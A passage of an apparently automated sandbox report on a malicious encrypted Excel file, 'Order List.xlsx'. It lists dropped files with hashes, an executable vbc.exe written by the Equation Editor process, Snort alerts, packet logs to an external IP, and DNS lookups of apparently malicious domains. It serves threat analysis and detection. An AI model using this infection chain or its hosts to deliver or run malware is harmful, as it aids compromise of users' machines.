                                                                                                                                                                SHA-256:E1D6328C979E9EEA70E1EB2721EB636C8989629FB72F5CF314FED2AD3C28ADAD
                                                                                                                                                                SHA-512:C47F29969934497630C664E3192E42DF859DADF21D5AB228F835FAE3CAEABF513F9264BD10A538198398A64B28E3AEABACFD3922802F67FE2A9D7CA9DFCC25F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................0...0.....$.0...0..N.X$.0...0.......0...0..N.X$.0...0. ....y.R..0.$.0. ............z.R............o...............................X...%...7...................{ .@................C.a.l.i.b.r...............0.X.....0.P.0..2.R..........0...0..{.R......0.....dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A92FDE74.jpeg
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):48770
                                                                                                                                                                Entropy (8bit):7.801842363879827
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                C:\Users\user\Desktop\~$Order List.xlsx
                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):330
                                                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                C:\Users\Public\vbc.exe
                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):552960
                                                                                                                                                                Entropy (8bit):7.8534634080579835
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:iYHsi433VV/WKmD8UT9Qw4RB07JglwNtAyYtoUqqwyniC:7Hs73NmD/6w4yOwrC9qgi
                                                                                                                                                                MD5:BF75ED61E1B1F7B310EC1D999077C4DD
                                                                                                                                                                SHA1:CDCED77E176E38FF459CDEA08941DE26861647CD
                                                                                                                                                                SHA-256:69357684EC8F83D428D2030DB5F3D586718207E86457465E7FD37B3B4B7C4DB2
                                                                                                                                                                SHA-512:D2FA7F6E1E41BEBEDBDBA492A163B8388F2326B92D939E9352C32F5BE5A311BB75E4374524B2B314B5A426763113935E00F4C81AACC26ED08E9C9DD356DD7510
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Wt._.................h............... ........@.. ..............................p.....@.................................@...K.......B............................................................................ ............... ..H............text....f... ...h.................. ..`.rsrc...B............j..............@..@.reloc...............n..............@..B................p.......H.......p...............q...t..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r%..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:CDFV2 Encrypted
                                                                                                                                                                Entropy (8bit):7.961051671042482
                                                                                                                                                                TrID:
                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                File name:Order List.xlsx
                                                                                                                                                                File size:201728
                                                                                                                                                                MD5:b86395637ffd2f1a85acfe7a2f43f8d6
                                                                                                                                                                SHA1:f378cb75a5b73b995c78bb0a779488059cc44c44
                                                                                                                                                                SHA256:36a4989dba737cef8d0067e2b7a06ad29e5ec9ea96bdb7d3e41cf08af37c8553
                                                                                                                                                                SHA512:abd4b1ad29cbe0c8417612246d249a7b8033e5f7bb0a9779057784d07d4342db01587ea83187867c3ed6503ffab8f28f9799ac86638e0e4c0b675df63498f39e
                                                                                                                                                                SSDEEP:6144:X50Jf4bccS7FoW3mt/BFyCf2WObrOfryqRkfx:X50R2cc0Fax3df2vWGx
                                                                                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                Static OLE Info

                                                                                                                                                                General

                                                                                                                                                                Document Type:OLE
                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                OLE File "Order List.xlsx"

                                                                                                                                                                Indicators

                                                                                                                                                                Has Summary Info:False
                                                                                                                                                                Application Name:unknown
                                                                                                                                                                Encrypted Document:True
                                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                Contains VBA Macros:False

                                                                                                                                                                Streams

                                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:64
                                                                                                                                                                Entropy:2.73637206947
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:112
                                                                                                                                                                Entropy:2.7597816111
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:200
                                                                                                                                                                Entropy:3.13335930328
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                General
                                                                                                                                                                Stream Path:\x6DataSpaces/Version
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:76
                                                                                                                                                                Entropy:2.79079600998
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                Stream Path: EncryptedPackage, File Type: data, Stream Size: 194888
                                                                                                                                                                General
                                                                                                                                                                Stream Path:EncryptedPackage
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:194888
                                                                                                                                                                Entropy:7.9982334381
                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                Data ASCII:> . . . . . . . . } . . I . . . N . . . . . Z . Q . [ . N " . . . . . . . . . . t } . . . B . . . . . ; . . . . b . . . s % . . N . o . . . . # . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . . a . . . + i . ( . . . . . . . .
                                                                                                                                                                Data Raw:3e f9 02 00 00 00 00 00 05 7d 7f 1c 49 b8 aa 0a 4e 98 88 c9 a1 19 5a f8 51 81 5b 91 4e 22 a2 b6 a3 01 b4 8f c2 fb 16 11 74 7d 08 d3 f0 42 c9 c0 ee 9f 0b 3b dd ec 91 c2 62 c0 ba ae 73 25 c6 d7 4e a7 6f f4 ef a5 88 23 81 1e 93 07 b5 e8 8c ef 61 b3 9d 8a 2b 69 ad 28 81 1e 93 07 b5 e8 8c ef 61 b3 9d 8a 2b 69 ad 28 81 1e 93 07 b5 e8 8c ef 61 b3 9d 8a 2b 69 ad 28 81 1e 93 07 b5 e8 8c ef
                                                                                                                                                                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                General
                                                                                                                                                                Stream Path:EncryptionInfo
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:224
                                                                                                                                                                Entropy:4.55670929471
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . z . . E . u s t . ' . . N . K 4 < . + V . . . . ! . . L . . . . . . . % . . . . . . / . a . K [ . - b . . b . p / . . . _ . . a
                                                                                                                                                                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                Network Behavior

                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                11/20/20-12:06:20.512626TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22
                                                                                                                                                                11/20/20-12:06:53.215748TCP1201ATTACK-RESPONSES 403 Forbidden804917234.102.136.180192.168.2.22

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 20, 2020 12:05:20.490442991 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.608998060 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.609134912 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.609724998 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.729680061 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.729753017 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.729768038 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.729798079 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.729820013 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.729836941 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.730025053 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.730045080 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.850131989 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850193024 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850224018 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850255013 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850292921 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850331068 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850368977 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850425959 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.850475073 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.850522041 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.850531101 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.968820095 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.968882084 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.968913078 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.968945026 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.968983889 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969019890 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969068050 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969109058 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969146013 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969171047 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969182968 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969204903 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969211102 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969214916 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969222069 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969255924 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969259977 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969290972 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969300032 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969321966 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969336987 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969362020 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969408989 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:20.969433069 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.969470024 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:20.972110033 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090423107 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090480089 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090521097 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090559959 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090598106 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090646029 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090688944 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090723991 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090729952 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090759039 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090764999 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090769053 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090769053 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090807915 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090816975 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090837955 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090847015 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090874910 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090886116 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090920925 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090924025 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090941906 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.090971947 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.090981007 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091015100 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091029882 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091052055 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091058016 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091090918 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091110945 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091129065 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091134071 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091166019 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091185093 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091202974 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091217995 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091239929 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091259003 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091288090 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091289997 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091329098 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091345072 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091366053 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091377974 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091404915 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091423035 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091443062 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091464043 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091479063 CET8049165198.23.212.188192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:05:21.091497898 CET4916580192.168.2.22198.23.212.188
                                                                                                                                                                Nov 20, 2020 12:05:21.091516972 CET8049165198.23.212.188192.168.2.22

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 20, 2020 12:06:06.492037058 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:06.922523975 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:14.227207899 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:14.526599884 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:20.333092928 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:20.373017073 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:30.583833933 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:30.625853062 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:35.975224972 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:36.130682945 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:41.410654068 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:41.452959061 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:47.549561024 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:47.609066010 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:53.033955097 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:53.072963953 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:06:58.232968092 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:06:58.697033882 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                Nov 20, 2020 12:07:03.698806047 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                Nov 20, 2020 12:07:03.852780104 CET53524968.8.8.8192.168.2.22

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Nov 20, 2020 12:06:06.492037058 CET192.168.2.228.8.8.80x708cStandard query (0)www.nanox.ltdA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:14.227207899 CET192.168.2.228.8.8.80xa14dStandard query (0)www.alloutdoorspeaker.comA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:20.333092928 CET192.168.2.228.8.8.80xccffStandard query (0)www.teelinkz.comA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:30.583833933 CET192.168.2.228.8.8.80x2f03Standard query (0)www.natcandy.comA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:35.975224972 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.californiapropiedades.comA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:41.410654068 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.pornfilm3d.comA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:47.549561024 CET192.168.2.228.8.8.80xf09aStandard query (0)www.the-trinity-project.comA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:53.033955097 CET192.168.2.228.8.8.80x4b92Standard query (0)www.crimson.schoolA (IP address)IN (0x0001)
                                                                                                                                                                Nov 20, 2020 12:06:58.232968092 CET192.168.2.228.8.8.80x4b93Standard query (0)www.heritagediscovery.infoA (IP address)IN (0x0001)
